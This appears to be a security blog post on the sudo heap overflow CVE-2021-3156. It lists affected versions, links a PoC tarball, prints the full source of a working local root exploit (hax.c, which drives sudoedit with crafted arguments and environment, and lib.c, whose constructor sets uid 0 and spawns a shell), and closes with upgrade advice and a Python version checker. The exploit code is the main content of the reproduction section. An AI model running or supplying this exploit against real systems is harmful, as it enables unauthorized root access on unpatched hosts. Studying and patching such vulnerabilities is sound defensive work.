Linux sudo privilege escalation vulnerability CVE-2021-3156: PoC and reproduction

cHr1s 2021-01-31 00:30

Vulnerability overview

On 26 January 2021 a foreign research team disclosed a heap overflow in sudo (CVE-2021-3156). Using this vulnerability, an unprivileged account can obtain root privileges on a host running the default sudo configuration. It affects all legacy versions from 1.8.2 to 1.8.31p2 and all stable versions from 1.9.0 to 1.9.5p1. The researchers have already exploited it on Ubuntu 20.04, Debian 10 and Fedora 33 and published the technical details.

Affected versions

All sudo versions from 1.8.2 to 1.8.31p2

All stable sudo versions from 1.9.0 to 1.9.5p1

Reproduction

PoC download:

https://haxx.in/CVE-2021-3156_nss_poc_ubuntu.tar.gz

Target environment

Reproduction steps

PoC

hax.c

//
// CVE-2021-3156 PoC by blasty <peter@haxx.in>
// ===========================================
//
// Tested on:
// Ubuntu 20.04.1 LTS
// Sudo version 1.8.31
// Sudoers policy plugin version 1.8.31
// Sudoers file grammar version 46
// Sudoers I/O plugin version 1.8.31
// 
// shout out to Qualys for pumping out awesome bugs
// shout out to lockedbyte for coop hax. (shared tmux gdb sessions ftw)
// shout out to dsc for giving me extra cpu cycles to burn.
//
// Enjoy!
//
//   -- blasty // 20213001

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#include <ctype.h>

#define SUDOEDIT_PATH "/usr/bin/sudoedit"

int main(int argc, char *argv[]) {
	// CTF quality exploit below.
	char *s_argv[]={
		"sudoedit",
		"-u", "root", "-s",
		"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\\",
		"\\",
		"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB123456\\",
		NULL
	};

	char *s_envp[]={
		"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
		"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
		"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
		"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
		"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
		"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
		"\\", "\\", "\\", "\\", "\\", "\\", "\\", "\\",
		"\\", "\\", "\\", "\\", "\\", "\\", "\\",  
		"X/P0P_SH3LLZ_", "\\",
		"LC_MESSAGES=C.UTF-8@AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
		"LC_ALL=C.UTF-8@AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
		"LC_CTYPE=C.UTF-8@AAAAAAAAAAAAAA",
		NULL
	};

	printf("**** CVE-2021-3156 PoC by blasty <peter@haxx.in>\n");

	execve(SUDOEDIT_PATH, s_argv, s_envp);

	return 0;
}

lib.c

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
 
static void __attribute__ ((constructor)) _init(void);
 
static void _init(void) {
	// Runs at library load time inside the process that picked up this library.
	printf("[+] bl1ng bl1ng! We got it!\n");
	setuid(0); seteuid(0); setgid(0); setegid(0);
	static char *a_argv[] = { "sh", NULL };
	static char *a_envp[] = { "PATH=/bin:/usr/bin:/sbin", NULL };
	// execve() so the minimal environment above is actually passed to the shell
	execve("/bin/sh", a_argv, a_envp);
}

Remediation

Upgrade to a fixed version:

  • Fixed version: Sudo ≥ 1.9.5p2

Latest official release download: https://www.sudo.ws/dist/
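To check whether a host's sudo falls inside the affected ranges listed above (1.8.2 to 1.8.31p2, 1.9.0 to 1.9.5p1, fixed in 1.9.5p2), the following added script parses the upstream version string from `sudo -V` and compares it against those ranges. This is an example written for this page, not code from the PoC or the sudo project; the sample `sudo -V` output embedded in it is constructed.

```python
import re
import subprocess
from typing import Optional, Tuple

Version = Tuple[int, int, int, int]  # (major, minor, patch, pN); pN is 0 when absent

# Affected ranges from the advisory above, inclusive on both ends;
# the first fixed release is 1.9.5p2.
AFFECTED_RANGES = (
    ((1, 8, 2, 0), (1, 8, 31, 2)),
    ((1, 9, 0, 0), (1, 9, 5, 1)),
)

# `sudo -V` prints its first line as "Sudo version 1.8.31" (or e.g. "1.9.5p2").
VERSION_RE = re.compile(r"^Sudo version (\d+)\.(\d+)\.(\d+)(?:p(\d+))?", re.MULTILINE)


def parse_sudo_version(output: str) -> Optional[Version]:
    """Extract the upstream version tuple from `sudo -V` output, or None if absent."""
    m = VERSION_RE.search(output)
    if m is None:
        return None
    major, minor, patch, p = m.groups()
    return (int(major), int(minor), int(patch), int(p or 0))


def is_affected_version(version: Version) -> bool:
    """True if the version lies inside one of the affected ranges (tuple comparison)."""
    return any(lo <= version <= hi for lo, hi in AFFECTED_RANGES)


def check_installed_sudo() -> Optional[bool]:
    """Run `sudo -V` on this host; True = affected range, False = outside, None = unknown."""
    try:
        proc = subprocess.run(["sudo", "-V"], capture_output=True, text=True, timeout=10)
    except (OSError, subprocess.TimeoutExpired):
        return None
    version = parse_sudo_version(proc.stdout)
    return None if version is None else is_affected_version(version)


# Constructed sample output, matching the version the PoC header above was tested on.
SAMPLE_OUTPUT = "Sudo version 1.8.31\nSudoers policy plugin version 1.8.31\n"

if __name__ == "__main__":
    sample = parse_sudo_version(SAMPLE_OUTPUT)
    print("sample 1.8.31 affected:", is_affected_version(sample))  # True
    print("this host affected:", check_installed_sudo())
```

Distribution packages often backport the fix without changing the upstream version string, so treat a positive result from this version check as a prompt to inspect the package changelog rather than as proof the host is exploitable.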
